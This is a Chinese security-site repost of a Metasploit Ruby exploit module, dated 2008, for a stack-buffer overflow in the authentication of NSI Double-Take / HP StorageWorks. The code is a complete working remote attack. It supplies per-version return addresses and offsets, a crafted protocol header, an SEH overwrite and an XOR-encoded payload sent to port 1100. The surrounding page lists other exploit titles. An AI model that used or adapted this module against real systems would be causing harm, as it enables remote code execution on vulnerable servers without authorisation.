首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)
来源:ri0t[at]ri0tnet.net 作者:ri0t 发布时间:2008-06-05  
##
# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name'           => 'doubletake Overflow',
'Description'    => %q{
This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded
as hp storage works Vulnerability found by Titon of Bastard Labs.
},
'Author'         => [ 'ri0t <ri0t[at]ri0tnet.net>' ],
'Version'        => '$Revision: 9 $',
'References'     =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload'        =>
{
'Space'    => 500,
'BadChars' => "\x00",
},
'Platform'       => 'win',

'Targets'        =>
[
['doubletake 4.5.0',    { 'Ret' =>  0x006f5fa7, 'Offset' => 5544 } ],
['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], 
['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],
],
'DefaultTarget' => 0,

'Privileged'     => false,

'DisclosureDate' => ''

))

register_options(
[
Opt::RPORT(1100)
], self.class)
end

def exploit
                xor = Rex::Encoding::Xor::Byte
connect

print_status("Trying target #{target.name}...")

                header =
               "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+
               "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"

filler =  rand_text_english(1) * (target['Offset'])
seh = generate_seh_payload(target.ret)
                buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack("C"))
sploit =  header + filler + buffercoded[0]
sock.put(sploit)
handler
disconnect
end

end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component jotloader <=
·Joomla Component EasyBook 1.1
·ipbProArcade 2.5.1 (user) Remo
·Akamai Download Manager < 2.2.
·Joomla Component JooBlog 0.1.1
·Black Ice Software Inc Barcode
·C6 Messenger ActiveX Remote Do
·Black Ice Software Inc Barcode
·MDaemon <= 9.6.5 Multiple Remo
·Asterisk (SIP channel driver /
·Joomla Component acctexp <= 0.
·Black Ice Software Inc Barcode
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved